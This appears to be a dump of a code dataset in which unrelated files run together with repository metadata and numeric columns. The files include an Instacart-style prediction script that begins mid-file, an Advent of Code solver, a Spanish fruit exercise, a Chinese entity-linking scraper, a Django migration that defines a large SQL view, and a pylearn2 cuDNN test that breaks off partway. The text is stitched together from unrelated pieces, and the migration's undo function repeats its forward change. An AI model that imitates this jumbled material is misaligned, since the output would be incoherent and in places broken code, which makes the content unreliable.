#print(pd.pivot_table(comb_last[comb_last.first_o <= comb_last.order_number],
# values = 'bf', index = ['user_id', 'product_id'],
# columns = 'order_number').head(10))
temp.update(pd.pivot_table(comb_last[comb_last.first_o <= comb_last.order_number],
values = 'bf', index = ['user_id', 'product_id'],
columns = 'order_number'))
print(temp.head(10))
#temp.to_csv('temp.csv')
import logging
logging.basicConfig(filename='bayes.log',level=logging.DEBUG)
logging.debug("Started Posterior calculations")
print("Started Posterior calculations")
pred = pd.DataFrame(columns=['user_id', 'product_id'])
pred['user_id'] = pred.user_id.astype(np.int32)
pred['product_id'] = pred.product_id.astype(np.int32)
for uid in comb_last.user_id.unique():
if uid % 1000 == 0:
print("Posterior calculated until user %d" % uid)
logging.debug("Posterior calculated until user %d" % uid)
# del comb_last_temp
comb_last_temp = pd.DataFrame()
comb_last_temp = comb_last[comb_last['user_id'] == uid].reset_index()
# del com
com = pd.DataFrame()
com = pd.pivot_table(comb_last_temp[comb_last_temp.first_o == comb_last_temp.order_number],
values = 'bf', index = ['user_id', 'product_id'],
columns = 'order_number', dropna=False)
com = com.fillna(method='pad', axis=1).fillna(1)
com.update(pd.pivot_table(comb_last_temp[comb_last_temp.first_o <= comb_last_temp.order_number],
values = 'bf', index = ['user_id', 'product_id'],
columns = 'order_number'))
com.reset_index(inplace=True)
com['posterior'] = com.product(axis=1)
pred = pred.append(com.sort_values(by=['posterior'], ascending=False).head(10) \
.groupby('user_id')['product_id'].apply(list).reset_index())
print("Posterior calculated for all users")
logging.debug("Posterior calculated for all users")
pred = pred.rename(columns={'product_id': 'products'})
print(pred.head())
pred.to_csv('Finalpredictions.csv', index=False)
pred = pred.merge(test, on='user_id', how='left')[['order_id', 'products']]
pred['products'] = pred['products'].apply(lambda x: [int(i) for i in x]) \
.astype(str).apply(lambda x: x.strip('[]').replace(',', ''))
print(pred.head())
pred.to_csv('Testpredictions.csv', index=False) | 0 | 0 | 0 |
7fd92d07a2e0b82f1ab5b3fd18e39426450f7bfc | 2,152 | py | Python | week2/day8.py | shaunnorris/aoc2020 | 694b83ba26e0c43b4839affc90e4cfab3debbd07 | [
"MIT"
] | null | null | null | week2/day8.py | shaunnorris/aoc2020 | 694b83ba26e0c43b4839affc90e4cfab3debbd07 | [
"MIT"
] | null | null | null | week2/day8.py | shaunnorris/aoc2020 | 694b83ba26e0c43b4839affc90e4cfab3debbd07 | [
"MIT"
] | null | null | null | import copy
testfile = "day8_test_input.txt"
testdata = load_input_file(testfile)
todaylist = load_input_file("day8input.txt")
part1 = run_commands(todaylist)[0]
print("part1:", part1)
part2 = alter_commands(todaylist)
print("part2:", part2)
| 27.240506 | 75 | 0.574349 | import copy
testfile = "day8_test_input.txt"
def test_load_input_file():
assert len(load_input_file(testfile)) == 9
def load_input_file(target):
outputlist = []
with open(target) as f:
raw_list = [line.strip() for line in f]
for line in raw_list:
outputlist.append(line.split(" "))
return outputlist
testdata = load_input_file(testfile)
def test_run_commands():
assert run_commands(testdata) == (5, False)
def run_commands(cmdlist):
offset = 0
accumulator = 0
already_run = []
noloop = True
success = False
while noloop:
if offset not in already_run:
if offset < len(cmdlist):
command = cmdlist[offset][0]
qty = int(cmdlist[offset][1])
if command == "nop":
already_run.append(offset)
offset += 1
elif command == "acc":
already_run.append(offset)
offset += 1
accumulator += qty
elif command == "jmp":
already_run.append(offset)
offset = offset + qty
elif offset == len(cmdlist):
return accumulator, True
else:
noloop = False
return accumulator, success
def test_alter_commands():
assert alter_commands(testdata) == 8
def alter_commands(cmdlist):
jmpindices = [i for i, s in enumerate(cmdlist) if "jmp" in s]
nopindices = [i for i, s in enumerate(cmdlist) if "nop" in s]
indices = nopindices + jmpindices
for index in indices:
thisrun = copy.deepcopy(cmdlist)
if cmdlist[index][0] == "jmp":
thisrun[index][0] = "nop"
elif cmdlist[index][0] == "nop":
thisrun[index][0] = "jmp"
testrun = run_commands(thisrun)
if testrun[1] == True:
print("successful run found by changing instruction at", index)
return testrun[0]
todaylist = load_input_file("day8input.txt")
part1 = run_commands(todaylist)[0]
print("part1:", part1)
part2 = alter_commands(todaylist)
print("part2:", part2)
| 1,761 | 0 | 138 |
0d36937846c01413e0090a7643f6609fb8616a0a | 445 | py | Python | Ago-Dic-2019/Luis Llanes/Practica1/ejercicio5-7.py | Arbupa/DAS_Sistemas | 52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1 | [
"MIT"
] | 41 | 2017-09-26T09:36:32.000Z | 2022-03-19T18:05:25.000Z | Ago-Dic-2019/Luis Llanes/Practica1/ejercicio5-7.py | Arbupa/DAS_Sistemas | 52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1 | [
"MIT"
] | 67 | 2017-09-11T05:06:12.000Z | 2022-02-14T04:44:04.000Z | Ago-Dic-2019/Luis Llanes/Practica1/ejercicio5-7.py | Arbupa/DAS_Sistemas | 52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1 | [
"MIT"
] | 210 | 2017-09-01T00:10:08.000Z | 2022-03-19T18:05:12.000Z | Frutas_favoritas = ["Mangos", "Manzanas", "Bananas"]
if("Mangos" in Frutas_favoritas):
print("La neta si me gustan mucho los Manguitos")
if("Cocos" in Frutas_favoritas):
print("En verdad me agradan los cocos")
if("Manzanas" in Frutas_favoritas):
print("Me gustan mucho las manzanas")
if("Kiwis" in Frutas_favoritas):
print("Comer kiwis esta chido")
if("Bananas" in Frutas_favoritas):
print("Las bananas saben muy ricas") | 27.8125 | 53 | 0.71236 | Frutas_favoritas = ["Mangos", "Manzanas", "Bananas"]
if("Mangos" in Frutas_favoritas):
print("La neta si me gustan mucho los Manguitos")
if("Cocos" in Frutas_favoritas):
print("En verdad me agradan los cocos")
if("Manzanas" in Frutas_favoritas):
print("Me gustan mucho las manzanas")
if("Kiwis" in Frutas_favoritas):
print("Comer kiwis esta chido")
if("Bananas" in Frutas_favoritas):
print("Las bananas saben muy ricas") | 0 | 0 | 0 |
98bebd6603bbed75923ed756d9394c967e7166a2 | 2,430 | py | Python | scrapy/get_enti_and_know.py | LouisYZK/recruitKG | 2f65f005230ea0ca05eb45d9e1e689f83dec2720 | [
"MIT"
] | null | null | null | scrapy/get_enti_and_know.py | LouisYZK/recruitKG | 2f65f005230ea0ca05eb45d9e1e689f83dec2720 | [
"MIT"
] | null | null | null | scrapy/get_enti_and_know.py | LouisYZK/recruitKG | 2f65f005230ea0ca05eb45d9e1e689f83dec2720 | [
"MIT"
] | null | null | null | import sqlite3
import requests
import json
import time
"""
Input: doc from zhilian_doc.db
Aim:
get the entities/knowledges in the doc.
store them into entites.json/knowledges.json
entities.json:
{
'name+position':List(entities),
}
konwledges.json:
{
'entity':[
['relation', 'entity'],
...
],
}
"""
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'
}
conn = sqlite3.connect('zhilian_doc.db')
cur = conn.cursor()
data = cur.execute('select * from zhilian_doc')
seen_entity = set()
name, pos, doc = next(data)
entities = get_entity(doc)
while True:
name, pos, doc = next(data)
time.sleep(3)
entities = get_entity(doc)
entities = list(flatten(entities))
# knows = get_triple_tuple(entities)
print(entities)
# en_store_to_json(name, pos, entities)
# konw_store_to_json(name, pos, knows)
| 25.851064 | 139 | 0.617695 | import sqlite3
import requests
import json
import time
"""
Input: doc from zhilian_doc.db
Aim:
get the entities/knowledges in the doc.
store them into entites.json/knowledges.json
entities.json:
{
'name+position':List(entities),
}
konwledges.json:
{
'entity':[
['relation', 'entity'],
...
],
}
"""
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'
}
def flatten(items):
for x in items:
if hasattr(x,'__iter__') and not isinstance(x, (str, bytes)):
# for sub_x in flatten(x):
# yield sub_x
yield from flatten(x)
else:
yield x
def get_entity(doc):
url = 'http://shuyantech.com/api/entitylinking/cutsegment'
doc = doc.split('。')
entities = []
for item in doc:
params = {'q':item}
r = requests.get(url, params=params, headers=headers)
entity = json.loads(r.text)['entities']
entities.append([item2[1] for item2 in entity])
return entities
def get_triple_tuple(entities):
url = 'http://shuyantech.com/api/cndbpedia/avpair'
know = {}
for item in entities:
if item not in seen_entity:
seen_entity.add(item)
params = {'q':item}
text = requests.get(url, params=params, headers=headers).text
knowledge = json.loads(text)['ret']
know[item] = knowledge
return know
def en_store_to_json(name, pos, entities):
en = {}
with open('./entities.json', 'a') as fp:
en[name + pos] = entities
json.dump(en, fp)
def konw_store_to_json(name, pos, knows):
with open('./knows.json', 'a') as fp:
json.dump(knows, fp)
def get_proxy():
return requests.get("http://127.0.0.1:5010/get/").content
def delete_proxy(proxy):
requests.get("http://127.0.0.1:5010/delete/?proxy={}".format(proxy))
conn = sqlite3.connect('zhilian_doc.db')
cur = conn.cursor()
data = cur.execute('select * from zhilian_doc')
seen_entity = set()
name, pos, doc = next(data)
entities = get_entity(doc)
while True:
name, pos, doc = next(data)
time.sleep(3)
entities = get_entity(doc)
entities = list(flatten(entities))
# knows = get_triple_tuple(entities)
print(entities)
# en_store_to_json(name, pos, entities)
# konw_store_to_json(name, pos, knows)
| 1,310 | 0 | 161 |
438643e5aacef760fca7aa171a129595bcaf3cd1 | 26,276 | py | Python | cit-api/pipeline/migrations/0149_auto_20210416_1946.py | bcgov/CIT | b9db4f169b52e9a6293b3ee1e61935888074215a | [
"Apache-2.0"
] | 10 | 2020-11-12T15:13:40.000Z | 2022-03-05T22:33:08.000Z | cit-api/pipeline/migrations/0149_auto_20210416_1946.py | bcgov/CIT | b9db4f169b52e9a6293b3ee1e61935888074215a | [
"Apache-2.0"
] | 28 | 2020-07-17T16:33:55.000Z | 2022-03-21T16:24:25.000Z | cit-api/pipeline/migrations/0149_auto_20210416_1946.py | bcgov/CIT | b9db4f169b52e9a6293b3ee1e61935888074215a | [
"Apache-2.0"
] | 5 | 2020-11-02T23:39:53.000Z | 2022-03-01T19:09:45.000Z | # Generated by Django 2.2.16 on 2021-04-16 19:46
from django.db import migrations
| 61.106977 | 169 | 0.590463 | # Generated by Django 2.2.16 on 2021-04-16 19:46
from django.db import migrations
def change_status(apps, schema_editor):
ApprovalStatus = apps.get_model("pipeline", "ApprovalStatus")
status = ApprovalStatus.objects.get(status_code="CLOS")
status.status_name = "Closed"
status.save()
def undo_change_status(apps, schema_editor):
ApprovalStatus = apps.get_model("pipeline", "ApprovalStatus")
status = ApprovalStatus.objects.get(status_code="CLOS")
status.status_name = "Closed"
status.save()
class Migration(migrations.Migration):
dependencies = [
('pipeline', '0148_indianreservebandname_band_name'),
]
operations = [
migrations.RunPython(change_status, undo_change_status),
migrations.RunSQL("""DROP VIEW IF EXISTS public.cit_opportunities_vw;
CREATE OR REPLACE VIEW public.cit_opportunities_vw
AS
SELECT o.id AS opportunity_id,
o.opportunity_address,
st_y(o.geo_position) AS latitude,
st_x(o.geo_position) AS longitude,
o.date_created,
o.date_updated,
( SELECT a.status_name AS approval_status_name
FROM pipeline_approvalstatus a
WHERE a.status_code::text = o.approval_status_id::text) AS approval_status_name,
( SELECT a.status_description AS approval_status_description
FROM pipeline_approvalstatus a
WHERE a.status_code::text = o.approval_status_id::text) AS approval_status_description,
( SELECT a.active_status AS approval_status_active_ind
FROM pipeline_approvalstatus a
WHERE a.status_code::text = o.approval_status_id::text) AS approval_status_active_ind,
o.business_contact_email,
o.business_contact_name,
o.community_link AS community_url,
o.elevation_at_location AS location_elevation,
o.environmental_information,
o.opportunity_description,
o.opportunity_electrical_capacity,
o.opportunity_electrical_connected AS opportunity_electrical_connected_ind,
o.opportunity_link AS opportunity_url,
o.opportunity_name,
o.opportunity_natural_gas_capacity,
o.opportunity_natural_gas_connected AS opportunity_natural_gas_connected_ind,
o.opportunity_road_connected AS opportunity_road_connected_ind,
o.opportunity_sewer_capacity,
o.opportunity_sewer_connected AS opportunity_sewer_connected_ind,
o.opportunity_water_capacity,
o.opportunity_water_connected AS opportunity_water_connected_ind,
o.parcel_ownership,
o.parcel_size AS parcel_size_acres,
o.pid,
o.soil_drainage,
o.soil_name,
o.soil_texture,
o.last_admin,
o.public_note,
o.date_published,
( SELECT l.name
FROM pipeline_landusezoning l
WHERE l.code::text = o.land_use_zoning::text) AS land_use_zoning_name,
( SELECT l.description
FROM pipeline_landusezoning l
WHERE l.code::text = o.land_use_zoning::text) AS land_use_zoning_desc,
( SELECT l.name
FROM pipeline_landusezoning l
WHERE l.code::text = o.ocp_zoning_code::text) AS ocp_zoning_name,
( SELECT l.description
FROM pipeline_landusezoning l
WHERE l.code::text = o.ocp_zoning_code::text) AS ocp_zoning_desc,
( SELECT p.name
FROM pipeline_propertystatus p
WHERE p.code::text = o.opportunity_property_status::text) AS opportunity_property_status_name,
( SELECT p.description
FROM pipeline_propertystatus p
WHERE p.code::text = o.opportunity_property_status::text) AS opportunity_property_status_desc,
o.nearest_transmission_line AS nearest_transmission_line_distance,
( SELECT l.name
FROM pipeline_airportdistance d,
pipeline_airport a,
pipeline_location l
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id AND a.location_ptr_id = l.id) AS nearest_airport,
( SELECT a.description
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_type,
( SELECT a.aerodrome_status
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_aerodrome_status,
( SELECT a.aircraft_access_ind
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_aircraft_access_ind,
( SELECT a.elevation
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_airport_elevation,
( SELECT a.fuel_availability_ind
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_fuel_availability_ind,
( SELECT a.helicopter_access_ind
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_helicopter_access_ind,
( SELECT a.max_runway_length
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_max_runway_length,
( SELECT a.number_of_runways
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_number_of_runways,
( SELECT a.runway_surface
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_runway_surface,
( SELECT a.oil_availability_ind
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_oil_availability_ind,
( SELECT a.seaplane_access_ind
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_seaplane_access_ind,
( SELECT d.airport_distance
FROM pipeline_airportdistance d
WHERE d.id = o.nearest_airport) AS nearest_airport_distance,
( SELECT l.name
FROM pipeline_firstresponderdistance d,
pipeline_firstresponder f,
pipeline_location l
WHERE d.id = o.nearest_ambulance_station AND d.first_responder_id = f.location_ptr_id AND f.location_ptr_id = l.id) AS nearest_ambulance_station,
( SELECT d.first_responder_distance
FROM pipeline_firstresponderdistance d
WHERE d.id = o.nearest_ambulance_station) AS nearest_ambulance_station_distance,
( SELECT l.name
FROM pipeline_firstresponderdistance d,
pipeline_firstresponder f,
pipeline_location l
WHERE d.id = o.nearest_coast_guard_station AND d.first_responder_id = f.location_ptr_id AND f.location_ptr_id = l.id) AS nearest_coast_guard_station,
( SELECT d.first_responder_distance
FROM pipeline_firstresponderdistance d
WHERE d.id = o.nearest_coast_guard_station) AS nearest_coast_guard_station_distance,
( SELECT l.name
FROM pipeline_customsportofentrydistance d,
pipeline_customsportofentry c,
pipeline_location l
WHERE d.id = o.nearest_customs_port_of_entry AND d.port_id = c.location_ptr_id AND c.location_ptr_id = l.id) AS nearest_customs_port_of_entry,
( SELECT c.customs_port_type
FROM pipeline_customsportofentrydistance d,
pipeline_customsportofentry c
WHERE d.id = o.nearest_customs_port_of_entry AND d.port_id = c.location_ptr_id) AS nearest_customs_port_type,
( SELECT c.customs_port_street_address
FROM pipeline_customsportofentrydistance d,
pipeline_customsportofentry c
WHERE d.id = o.nearest_customs_port_of_entry AND d.port_id = c.location_ptr_id) AS nearest_customs_port_street_address,
( SELECT c.customs_port_municipality
FROM pipeline_customsportofentrydistance d,
pipeline_customsportofentry c
WHERE d.id = o.nearest_customs_port_of_entry AND d.port_id = c.location_ptr_id) AS nearest_customs_port_municipality,
( SELECT d.customs_port_distance
FROM pipeline_customsportofentrydistance d
WHERE d.id = o.nearest_customs_port_of_entry) AS nearest_customs_port_of_entry_distance,
( SELECT l.name
FROM pipeline_firstresponderdistance d,
pipeline_firstresponder f,
pipeline_location l
WHERE d.id = o.nearest_fire_station AND d.first_responder_id = f.location_ptr_id AND f.location_ptr_id = l.id) AS nearest_fire_station,
( SELECT d.first_responder_distance
FROM pipeline_firstresponderdistance d
WHERE d.id = o.nearest_fire_station) AS nearest_fire_station_distance,
( SELECT l.name
FROM pipeline_hospitaldistance d,
pipeline_hospital h,
pipeline_location l
WHERE d.id = o.nearest_health_center AND d.hospital_id = h.location_ptr_id AND h.location_ptr_id = l.id) AS nearest_hospital,
( SELECT h.rg_name
FROM pipeline_hospitaldistance d,
pipeline_hospital h
WHERE d.id = o.nearest_health_center AND d.hospital_id = h.location_ptr_id) AS nearest_hospital_region_name,
( SELECT h.hours
FROM pipeline_hospitaldistance d,
pipeline_hospital h
WHERE d.id = o.nearest_health_center AND d.hospital_id = h.location_ptr_id) AS nearest_hospital_hours,
( SELECT h.sv_description
FROM pipeline_hospitaldistance d,
pipeline_hospital h
WHERE d.id = o.nearest_health_center AND d.hospital_id = h.location_ptr_id) AS nearest_hospital_services,
( SELECT d.hospital_distance
FROM pipeline_hospitaldistance d
WHERE d.id = o.nearest_health_center) AS nearest_hospital_distance,
( SELECT r.name
FROM pipeline_roadsandhighwaysdistance d,
pipeline_roadsandhighways r
WHERE d.id = o.nearest_highway AND d.highway_id = r.id) AS nearest_highway_name,
( SELECT r.road_name_alias1
FROM pipeline_roadsandhighwaysdistance d,
pipeline_roadsandhighways r
WHERE d.id = o.nearest_highway AND d.highway_id = r.id) AS nearest_highway_alias_1,
( SELECT r.road_name_alias2
FROM pipeline_roadsandhighwaysdistance d,
pipeline_roadsandhighways r
WHERE d.id = o.nearest_highway AND d.highway_id = r.id) AS nearest_highway_alias_2,
( SELECT r.number_of_lanes
FROM pipeline_roadsandhighwaysdistance d,
pipeline_roadsandhighways r
WHERE d.id = o.nearest_highway AND d.highway_id = r.id) AS nearest_highway_number_of_lanes,
( SELECT d.highway_distance
FROM pipeline_roadsandhighwaysdistance d
WHERE d.id = o.nearest_highway) AS nearest_highway_distance,
( SELECT l.name
FROM pipeline_lakedistance d,
pipeline_lake l
WHERE d.id = o.nearest_lake AND d.lake_id = l.id) AS nearest_lake,
( SELECT d.lake_distance
FROM pipeline_lakedistance d
WHERE d.id = o.nearest_lake) AS nearest_lake_distance,
( SELECT l.name
FROM pipeline_firstresponderdistance d,
pipeline_firstresponder f,
pipeline_location l
WHERE d.id = o.nearest_police_station AND d.first_responder_id = f.location_ptr_id AND f.location_ptr_id = l.id) AS nearest_police_station,
( SELECT d.first_responder_distance
FROM pipeline_firstresponderdistance d
WHERE d.id = o.nearest_police_station) AS nearest_police_station_distance,
( SELECT l.name
FROM pipeline_portandterminaldistance d,
pipeline_portandterminal p,
pipeline_location l
WHERE d.id = o.nearest_port AND d.port_id = p.location_ptr_id AND p.location_ptr_id = l.id) AS nearest_port,
( SELECT p.authority
FROM pipeline_portandterminaldistance d,
pipeline_portandterminal p
WHERE d.id = o.nearest_port AND d.port_id = p.location_ptr_id) AS nearest_port_authority,
( SELECT p.description
FROM pipeline_portandterminaldistance d,
pipeline_portandterminal p
WHERE d.id = o.nearest_port AND d.port_id = p.location_ptr_id) AS nearest_port_type,
( SELECT p.commodities_handled
FROM pipeline_portandterminaldistance d,
pipeline_portandterminal p
WHERE d.id = o.nearest_port AND d.port_id = p.location_ptr_id) AS nearest_port_commodities_handled,
( SELECT p.physical_address
FROM pipeline_portandterminaldistance d,
pipeline_portandterminal p
WHERE d.id = o.nearest_port AND d.port_id = p.location_ptr_id) AS nearest_port_address,
( SELECT d.port_distance
FROM pipeline_portandterminaldistance d
WHERE d.id = o.nearest_port) AS nearest_port_distance,
( SELECT l.name
FROM pipeline_postsecondarydistance d,
pipeline_postsecondaryinstitution p,
pipeline_location l
WHERE d.id = o.nearest_post_secondary AND d.location_id = p.location_ptr_id AND p.location_ptr_id = l.id) AS nearest_post_secondary_name,
( SELECT p.institution_type
FROM pipeline_postsecondarydistance d,
pipeline_postsecondaryinstitution p
WHERE d.id = o.nearest_post_secondary AND d.location_id = p.location_ptr_id) AS nearest_post_secondary_type,
( SELECT d.location_distance
FROM pipeline_postsecondarydistance d
WHERE d.id = o.nearest_post_secondary) AS nearest_post_secondary_distance,
( SELECT r.name
FROM pipeline_railwaydistance d,
pipeline_railway r
WHERE d.id = o.nearest_railway AND d.railway_id = r.id) AS nearest_railway_name,
( SELECT r.use_type
FROM pipeline_railwaydistance d,
pipeline_railway r
WHERE d.id = o.nearest_railway AND d.railway_id = r.id) AS nearest_railway_use_type,
( SELECT r.number_of_tracks
FROM pipeline_railwaydistance d,
pipeline_railway r
WHERE d.id = o.nearest_railway AND d.railway_id = r.id) AS nearest_railway_number_of_tracks,
( SELECT r.electrification
FROM pipeline_railwaydistance d,
pipeline_railway r
WHERE d.id = o.nearest_railway AND d.railway_id = r.id) AS nearest_electrification,
( SELECT r.status
FROM pipeline_railwaydistance d,
pipeline_railway r
WHERE d.id = o.nearest_railway AND d.railway_id = r.id) AS nearest_railway_status,
( SELECT r.track_classification
FROM pipeline_railwaydistance d,
pipeline_railway r
WHERE d.id = o.nearest_railway AND d.railway_id = r.id) AS nearest_railway_track_class,
( SELECT r.operator_english_name
FROM pipeline_railwaydistance d,
pipeline_railway r
WHERE d.id = o.nearest_railway AND d.railway_id = r.id) AS nearest_railway_operator,
( SELECT d.railway_distance
FROM pipeline_railwaydistance d
WHERE d.id = o.nearest_railway) AS nearest_railway_distance,
( SELECT l.name
FROM pipeline_researchcentredistance d,
pipeline_researchcentre r,
pipeline_location l
WHERE d.id = o.nearest_research_centre AND d.research_centre_id = r.location_ptr_id AND r.location_ptr_id = l.id) AS nearest_research_centre,
( SELECT r.research_specialties
FROM pipeline_researchcentredistance d,
pipeline_researchcentre r
WHERE d.id = o.nearest_research_centre AND d.research_centre_id = r.location_ptr_id) AS nearest_research_specialties,
( SELECT r.research_centre_affiliation
FROM pipeline_researchcentredistance d,
pipeline_researchcentre r
WHERE d.id = o.nearest_research_centre AND d.research_centre_id = r.location_ptr_id) AS nearest_research_centre_affiliation,
( SELECT r.inst_acrnm
FROM pipeline_researchcentredistance d,
pipeline_researchcentre r
WHERE d.id = o.nearest_research_centre AND d.research_centre_id = r.location_ptr_id) AS nearest_research_centre_acronym,
( SELECT r.research_sector
FROM pipeline_researchcentredistance d,
pipeline_researchcentre r
WHERE d.id = o.nearest_research_centre AND d.research_centre_id = r.location_ptr_id) AS nearest_research_centre_research_sector,
( SELECT r.cntr_type
FROM pipeline_researchcentredistance d,
pipeline_researchcentre r
WHERE d.id = o.nearest_research_centre AND d.research_centre_id = r.location_ptr_id) AS nearest_research_centre_type,
( SELECT r.institution
FROM pipeline_researchcentredistance d,
pipeline_researchcentre r
WHERE d.id = o.nearest_research_centre AND d.research_centre_id = r.location_ptr_id) AS nearest_research_centre_institution,
( SELECT d.research_centre_distance
FROM pipeline_researchcentredistance d
WHERE d.id = o.nearest_research_centre) AS nearest_research_center_distance,
( SELECT r.name
FROM pipeline_riverdistance d,
pipeline_river r
WHERE d.id = o.nearest_river AND d.river_id = r.id) AS nearest_river,
( SELECT d.river_distance
FROM pipeline_riverdistance d
WHERE d.id = o.nearest_river) AS nearest_river_distance,
o.opportunity_rental_price,
o.opportunity_sale_price,
( SELECT c.place_name
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS community_name,
( SELECT c.community_type
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS community_type,
( SELECT c.band_number
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS band_number,
( SELECT c.fn_community_name
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS first_nation_community_name,
( SELECT c.nation
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS first_nation,
( SELECT c.num_courts
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS num_courts,
( SELECT c.num_hospitals
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS num_hospitals,
( SELECT c.num_schools
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS num_schools,
( SELECT c.num_timber_facilities
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS num_timber_facilities,
( SELECT c.incorporated
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS incorporated_ind,
( SELECT c.has_any_k12_school
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS has_any_k12_school_ind,
( SELECT c.is_coastal
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS is_coastal_ind,
( SELECT c.nearest_substation_distance
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS nearest_substation_distance,
( SELECT c.nearest_substation_name
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS nearest_substation_name,
( SELECT c.nearest_transmission_distance
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS nearest_transmission_distance,
( SELECT c.transmission_line_description
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS transmission_line_description,
( SELECT c.transmission_line_voltage
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS transmission_line_voltage,
( SELECT d.community_distance
FROM pipeline_communitydistance d
WHERE d.id = o.nearest_community) AS nearest_community_distance,
( SELECT m.name
FROM pipeline_municipality m
WHERE m.id = o.municipality_id) AS municipality,
( SELECT r.name
FROM pipeline_regionaldistrict r
WHERE r.id = o.regional_district_id) AS regional_district,
o.network_at_road,
o.network_avg
FROM pipeline_opportunity o;
""")
]
| 397 | 25,725 | 69 |
a3fc35eb5e2380fc537e6fcf21e7f38540d03f6c | 6,045 | py | Python | pylearn2/linear/tests/test_cudnn.py | ikervazquezlopez/Pylearn2 | 2971e8f64374ffde572d4cf967aad5342beaf5e0 | [
"BSD-3-Clause"
] | 2,045 | 2015-01-01T14:07:52.000Z | 2022-03-08T08:56:41.000Z | pylearn2/linear/tests/test_cudnn.py | ikervazquezlopez/Pylearn2 | 2971e8f64374ffde572d4cf967aad5342beaf5e0 | [
"BSD-3-Clause"
] | 305 | 2015-01-02T13:18:24.000Z | 2021-08-20T18:03:28.000Z | pylearn2/linear/tests/test_cudnn.py | ikervazquezlopez/Pylearn2 | 2971e8f64374ffde572d4cf967aad5342beaf5e0 | [
"BSD-3-Clause"
] | 976 | 2015-01-01T17:08:51.000Z | 2022-03-25T19:53:17.000Z | """
Tests for the Cudnn code.
"""
__author__ = "Francesco Visin"
__license__ = "3-clause BSD"
__credits__ = "Francesco Visin"
__maintainer__ = "Lisa Lab"
import theano
from theano import tensor
from theano.sandbox.cuda.dnn import dnn_available
from pylearn2.linear.conv2d import Conv2D
from pylearn2.linear.cudnn2d import Cudnn2D, make_random_conv2D
from pylearn2.space import Conv2DSpace
from pylearn2.utils import sharedX
from pylearn2.testing.skip import skip_if_no_gpu
import unittest
from nose.plugins.skip import SkipTest
import numpy as np
class TestCudnn(unittest.TestCase):
"""
Tests for the Cudnn code.
Parameters
----------
Refer to unittest.TestCase.
"""
def setUp(self):
"""
Set up a test image and filter to re-use.
"""
skip_if_no_gpu()
if not dnn_available():
raise SkipTest('Skipping tests cause cudnn is not available')
self.orig_floatX = theano.config.floatX
theano.config.floatX = 'float32'
self.image = np.random.rand(1, 1, 3, 3).astype(theano.config.floatX)
self.image_tensor = tensor.tensor4()
self.input_space = Conv2DSpace((3, 3), 1, axes=('b', 'c', 0, 1))
self.filters_values = np.ones(
(1, 1, 2, 2), dtype=theano.config.floatX
)
self.filters = sharedX(self.filters_values, name='filters')
self.batch_size = 1
self.cudnn2d = Cudnn2D(self.filters, self.batch_size, self.input_space)
def tearDown(self):
"""
After test clean up.
"""
theano.config.floatX = self.orig_floatX
def test_value_errors(self):
"""
Check correct errors are raised when bad input is given.
"""
with self.assertRaises(AssertionError):
Cudnn2D(filters=self.filters, batch_size=-1,
input_space=self.input_space)
